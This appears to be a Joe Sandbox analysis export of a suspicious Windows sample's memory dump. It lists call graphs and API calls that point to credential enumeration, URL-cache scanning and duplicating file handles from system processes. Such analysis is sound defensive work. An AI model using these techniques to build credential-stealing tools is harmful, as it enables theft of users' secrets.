38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39072 40a97a 38946->39072 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39077 40b1ab free free 38951->39077 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39078 40aa1d 38959->39078 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39080 405220 38971->39080 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 
40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39071 40b1ab free free 39020->39071 39021->39020 39022 40e540 39022->39017 39070 40e2ab 30 API calls 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 
39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39070->39022 39071->39008 39073 40a980 39072->39073 39074 40a995 _wcsicmp 39073->39074 39075 40a99c wcscmp 39073->39075 39076 40a8bb 39073->39076 39074->39073 39075->39073 39076->38949 39076->38950 39077->38953 39079 40aa23 RegEnumValueW 39078->39079 39079->38962 39079->38963 39081 405335 39080->39081 39082 40522a 39080->39082 39081->38547 39083 40b2cc 27 API calls 39082->39083 39084 405234 39083->39084 39085 40a804 8 API calls 39084->39085 39086 40523a 39085->39086 39125 40b273 39086->39125 39088 405248 _mbscpy _mbscat GetProcAddress 39089 40b273 27 API calls 39088->39089 39090 405279 39089->39090 39128 405211 GetProcAddress 39090->39128 39092 405282 39093 40b273 27 API calls 39092->39093 39094 40528f 39093->39094 39129 405211 GetProcAddress 39094->39129 39096 405298 39097 40b273 27 API calls 39096->39097 39098 4052a5 39097->39098 39130 405211 GetProcAddress 39098->39130 39100 4052ae 39101 40b273 27 API calls 39100->39101 39102 4052bb 39101->39102 39131 405211 GetProcAddress 39102->39131 39104 4052c4 39105 40b273 27 API calls 39104->39105 39106 4052d1 39105->39106 39132 405211 GetProcAddress 
39106->39132 39108 4052da 39109 40b273 27 API calls 39108->39109 39110 4052e7 39109->39110 39133 405211 GetProcAddress 39110->39133 39112 4052f0 39113 40b273 27 API calls 39112->39113 39114 4052fd 39113->39114 39134 405211 GetProcAddress 39114->39134 39116 405306 39117 40b273 27 API calls 39116->39117 39118 405313 39117->39118 39135 405211 GetProcAddress 39118->39135 39120 40531c 39121 40b273 27 API calls 39120->39121 39122 405329 39121->39122 39136 405211 GetProcAddress 39122->39136 39124 405332 39124->39081 39126 40b58d 27 API calls 39125->39126 39127 40b18c 39126->39127 39127->39088 39128->39092 39129->39096 39130->39100 39131->39104 39132->39108 39133->39112 39134->39116 39135->39120 39136->39124 39138 40440c FreeLibrary 39137->39138 39139 40436d 39138->39139 39140 40a804 8 API calls 39139->39140 39141 404377 39140->39141 39142 404383 39141->39142 39143 404405 39141->39143 39144 40b273 27 API calls 39142->39144 39143->38559 39143->38561 39143->38562 39145 40438d GetProcAddress 39144->39145 39146 40b273 27 API calls 39145->39146 39147 4043a7 GetProcAddress 39146->39147 39148 40b273 27 API calls 39147->39148 39149 4043ba GetProcAddress 39148->39149 39150 40b273 27 API calls 39149->39150 39151 4043ce GetProcAddress 39150->39151 39152 40b273 27 API calls 39151->39152 39153 4043e2 GetProcAddress 39152->39153 39154 4043f1 39153->39154 39155 4043f7 39154->39155 39156 40440c FreeLibrary 39154->39156 39155->39143 39156->39143 39158 404413 FreeLibrary 39157->39158 39159 40441e 39157->39159 39158->39159 39159->38576 39160->38572 39162 40447e 39161->39162 39163 40442e 39161->39163 39162->38572 39164 40b2cc 27 API calls 39163->39164 39165 404438 39164->39165 39166 40a804 8 API calls 39165->39166 39167 40443e 39166->39167 39168 404445 39167->39168 39169 404467 39167->39169 39170 40b273 27 API calls 39168->39170 39169->39162 39172 404475 FreeLibrary 39169->39172 39171 40444f GetProcAddress 39170->39171 39171->39169 39173 404460 39171->39173 39172->39162 39173->39169 39175 
4135f6 39174->39175 39176 4135eb FreeLibrary 39174->39176 39175->38579 39176->39175 39178 4449c4 39177->39178 39179 444a52 39177->39179 39180 40b2cc 27 API calls 39178->39180 39179->38596 39179->38597 39181 4449cb 39180->39181 39182 40a804 8 API calls 39181->39182 39183 4449d1 39182->39183 39184 40b273 27 API calls 39183->39184 39185 4449dc GetProcAddress 39184->39185 39186 40b273 27 API calls 39185->39186 39187 4449f3 GetProcAddress 39186->39187 39188 40b273 27 API calls 39187->39188 39189 444a04 GetProcAddress 39188->39189 39190 40b273 27 API calls 39189->39190 39191 444a15 GetProcAddress 39190->39191 39192 40b273 27 API calls 39191->39192 39193 444a26 GetProcAddress 39192->39193 39194 40b273 27 API calls 39193->39194 39195 444a37 GetProcAddress 39194->39195 39196 40b273 27 API calls 39195->39196 39197 444a48 GetProcAddress 39196->39197 39197->39179 39198->38607 39199->38607 39200->38607 39201->38607 39202->38598 39204 403a29 39203->39204 39218 403bed memset memset 39204->39218 39206 403ae7 39231 40b1ab free free 39206->39231 39207 403a3f memset 39211 403a2f 39207->39211 39209 403aef 39209->38614 39210 409d1f 6 API calls 39210->39211 39211->39206 39211->39207 39211->39210 39212 409b98 GetFileAttributesW 39211->39212 39213 40a8d0 7 API calls 39211->39213 39212->39211 39213->39211 39215 40a051 GetFileTime CloseHandle 39214->39215 39216 4039ca CompareFileTime 39214->39216 39215->39216 39216->38614 39217->38615 39219 414c2e 14 API calls 39218->39219 39220 403c38 39219->39220 39221 409719 2 API calls 39220->39221 39222 403c3f wcscat 39221->39222 39223 414c2e 14 API calls 39222->39223 39224 403c61 39223->39224 39225 409719 2 API calls 39224->39225 39226 403c68 wcscat 39225->39226 39232 403af5 39226->39232 39229 403af5 20 API calls 39230 403c95 39229->39230 39230->39211 39231->39209 39233 403b02 39232->39233 39234 40ae18 9 API calls 39233->39234 39243 403b37 39234->39243 39235 403bdb 39237 40aebe FindClose 39235->39237 39236 40add4 wcscmp wcscmp 39236->39243 39238 
403be6 39237->39238 39238->39229 39239 40a8d0 7 API calls 39239->39243 39240 40ae18 9 API calls 39240->39243 39241 40ae51 9 API calls 39241->39243 39242 40aebe FindClose 39242->39243 39243->39235 39243->39236 39243->39239 39243->39240 39243->39241 39243->39242 39245 409d1f 6 API calls 39244->39245 39246 404190 39245->39246 39259 409b98 GetFileAttributesW 39246->39259 39248 40419c 39249 4041a7 6 API calls 39248->39249 39250 40435c 39248->39250 39251 40424f 39249->39251 39250->38636 39251->39250 39253 40425e memset 39251->39253 39255 409d1f 6 API calls 39251->39255 39256 40a8ab 9 API calls 39251->39256 39260 414842 39251->39260 39253->39251 39254 404296 wcscpy 39253->39254 39254->39251 39255->39251 39257 4042b6 memset memset _snwprintf wcscpy 39256->39257 39257->39251 39258->38640 39259->39248 39263 41443e 39260->39263 39262 414866 39262->39251 39264 41444b 39263->39264 39265 414451 39264->39265 39266 4144a3 GetPrivateProfileStringW 39264->39266 39267 414491 39265->39267 39268 414455 wcschr 39265->39268 39266->39262 39270 414495 WritePrivateProfileStringW 39267->39270 39268->39267 39269 414463 _snwprintf 39268->39269 39269->39270 39270->39262 39271->38645 39273 40b2cc 27 API calls 39272->39273 39274 409615 39273->39274 39275 409d1f 6 API calls 39274->39275 39276 409625 39275->39276 39301 409b98 GetFileAttributesW 39276->39301 39278 409634 39279 409648 39278->39279 39302 4091b8 memset 39278->39302 39281 40b2cc 27 API calls 39279->39281 39283 408801 39279->39283 39282 40965d 39281->39282 39284 409d1f 6 API calls 39282->39284 39283->38648 39283->38692 39285 40966d 39284->39285 39354 409b98 GetFileAttributesW 39285->39354 39287 40967c 39287->39283 39288 409681 39287->39288 39355 409529 72 API calls 39288->39355 39290 409690 39290->39283 39291->38670 39292->38692 39293->38675 39294->38692 39295->38680 39296->38681 39301->39278 39356 40a6e6 WideCharToMultiByte 39302->39356 39304 409202 39357 444432 39304->39357 39307 40b273 27 API calls 39308 409236 39307->39308 39403 
438552 39308->39403 39311 409383 39313 40b273 27 API calls 39311->39313 39315 409399 39313->39315 39314 409254 39316 40937b 39314->39316 39424 4253cf 17 API calls 39314->39424 39317 438552 133 API calls 39315->39317 39428 424f26 122 API calls 39316->39428 39336 4093a3 39317->39336 39320 409267 39425 4253cf 17 API calls 39320->39425 39321 4094ff 39432 443d90 39321->39432 39324 4251c4 136 API calls 39324->39336 39325 409273 39426 4253af 17 API calls 39325->39426 39326 409507 39334 40951d 39326->39334 39452 408f2f 77 API calls 39326->39452 39328 4093df 39431 424f26 122 API calls 39328->39431 39330 4253cf 17 API calls 39330->39336 39334->39279 39336->39321 39336->39324 39336->39328 39336->39330 39338 4093e4 39336->39338 39429 4253af 17 API calls 39338->39429 39344 4093ed 39430 4253af 17 API calls 39344->39430 39347 4093f9 39347->39328 39348 409409 memcmp 39347->39348 39348->39328 39349 409421 memcmp 39348->39349 39350 4094a4 memcmp 39349->39350 39351 409435 39349->39351 39350->39328 39353 4094b8 memcpy memcpy 39350->39353 39351->39328 39352 409442 memcpy memcpy memcpy 39351->39352 39352->39328 39353->39328 39354->39287 39355->39290 39356->39304 39453 4438b5 39357->39453 39359 44444c 39365 409215 39359->39365 39467 415a6d 39359->39467 39362 444486 39364 4444b9 memcpy 39362->39364 39402 4444a4 39362->39402 39363 44469e 39363->39365 39367 443d90 110 API calls 39363->39367 39471 415258 39364->39471 39365->39307 39365->39334 39367->39365 39368 444524 39369 444541 39368->39369 39370 44452a 39368->39370 39474 444316 39369->39474 39508 416935 39370->39508 39374 444316 18 API calls 39375 444563 39374->39375 39376 444316 18 API calls 39375->39376 39377 44456f 39376->39377 39378 444316 18 API calls 39377->39378 39379 44457f 39378->39379 39379->39402 39488 432d4e 39379->39488 39382 444316 18 API calls 39383 4445b0 39382->39383 39492 41eed2 39383->39492 39521 4442e6 11 API calls 39402->39521 39522 438460 39403->39522 39405 409240 39405->39311 39406 4251c4 39405->39406 39534 424f07 
39406->39534 39408 4251e4 39409 4251f7 39408->39409 39410 4251e8 39408->39410 39542 4250f8 39409->39542 39541 4446ea 11 API calls 39410->39541 39412 4251f2 39412->39314 39414 425209 39417 425249 39414->39417 39420 4250f8 126 API calls 39414->39420 39421 425287 39414->39421 39550 4384e9 134 API calls 39414->39550 39551 424f74 123 API calls 39414->39551 39417->39421 39552 424ff0 13 API calls 39417->39552 39420->39414 39554 415c7d 16 API calls 39421->39554 39422 425266 39422->39421 39553 415be9 memcpy 39422->39553 39424->39320 39425->39325 39428->39311 39429->39344 39430->39347 39431->39321 39433 443da3 39432->39433 39451 443db6 39432->39451 39555 41707a 39433->39555 39435 443da8 39436 443dac 39435->39436 39438 443dbc 39435->39438 39568 4446ea 11 API calls 39436->39568 39560 4300e8 39438->39560 39451->39326 39452->39334 39454 4438d0 39453->39454 39460 4438c9 39453->39460 39455 415378 memcpy memcpy 39454->39455 39456 4438d5 39455->39456 39457 4154e2 10 API calls 39456->39457 39458 443906 39456->39458 39456->39460 39457->39458 39459 443970 memset 39458->39459 39458->39460 39462 44398b 39459->39462 39460->39359 39461 415700 10 API calls 39464 4439c0 39461->39464 39463 41975c 10 API calls 39462->39463 39465 4439a0 39462->39465 39463->39465 39464->39460 39466 418981 10 API calls 39464->39466 39465->39460 39465->39461 39466->39460 39468 415a77 39467->39468 39469 415a8d 39468->39469 39470 415a7e memset 39468->39470 39469->39362 39470->39469 39472 4438b5 11 API calls 39471->39472 39473 41525d 39472->39473 39473->39368 39475 444328 39474->39475 39476 444423 39475->39476 39477 44434e 39475->39477 39478 4446ea 11 API calls 39476->39478 39479 432d4e memset memset memcpy 39477->39479 39485 444381 39478->39485 39480 44435a 39479->39480 39482 444375 39480->39482 39487 44438b 39480->39487 39481 432d4e memset memset memcpy 39483 4443ec 39481->39483 39484 416935 16 API calls 39482->39484 39483->39485 39486 416935 16 API calls 39483->39486 39484->39485 39485->39374 39486->39485 
39487->39481 39489 432d58 39488->39489 39491 432d65 39488->39491 39490 432cc4 memset memset memcpy 39489->39490 39490->39491 39491->39382 39509 41693e 39508->39509 39512 41698e 39508->39512 39510 41694c 39509->39510 39511 422fd1 memset 39509->39511 39510->39512 39513 4165a0 11 API calls 39510->39513 39511->39510 39512->39402 39514 416972 39513->39514 39514->39512 39515 422b84 15 API calls 39514->39515 39515->39512 39521->39363 39523 41703f 11 API calls 39522->39523 39524 43847a 39523->39524 39525 43848a 39524->39525 39526 43847e 39524->39526 39528 438270 133 API calls 39525->39528 39527 4446ea 11 API calls 39526->39527 39530 438488 39527->39530 39529 4384aa 39528->39529 39529->39530 39531 424f26 122 API calls 39529->39531 39530->39405 39532 4384bb 39531->39532 39533 438270 133 API calls 39532->39533 39533->39530 39535 424f1f 39534->39535 39536 424f0c 39534->39536 39538 424eea 11 API calls 39535->39538 39537 416760 11 API calls 39536->39537 39539 424f18 39537->39539 39540 424f24 39538->39540 39539->39408 39540->39408 39541->39412 39543 425108 39542->39543 39549 42510d 39542->39549 39544 424f74 123 API calls 39543->39544 39544->39549 39545 42569b 124 API calls 39546 42516e 39545->39546 39548 415c7d 16 API calls 39546->39548 39547 425115 39547->39414 39548->39547 39549->39545 39549->39547 39550->39414 39551->39414 39552->39422 39553->39421 39554->39412 39556 417085 39555->39556 39557 4170ab 39555->39557 39556->39557 39558 416760 11 API calls 39556->39558 39557->39435 39559 4170a4 39558->39559 39559->39435 39561 430128 39560->39561 39564 4300fa 39560->39564 39563 430196 memset 39561->39563 39562 432f8c memset 39562->39564 39567 4301de 39563->39567 39564->39561 39564->39562 39564->39567 39568->39451 39598 413f4f 39571->39598 39574 413f37 K32GetModuleFileNameExW 39575 413f4a 39574->39575 39575->38708 39577 41396c wcschr 39576->39577 39579 413969 wcscpy 39576->39579 39577->39579 39580 41398e 39577->39580 39581 413a3a 39579->39581 39603 4097f7 wcslen wcslen _memicmp 

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph

APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 1344430650-1740548384
• Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
• Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                            APIs
                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 1690352074-0
                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3558857096-0
                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                            Control-flow Graph (graph image not recoverable from this export)
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                            • memset.MSVCRT ref: 00445725
                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                            • memset.MSVCRT ref: 00445755
                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
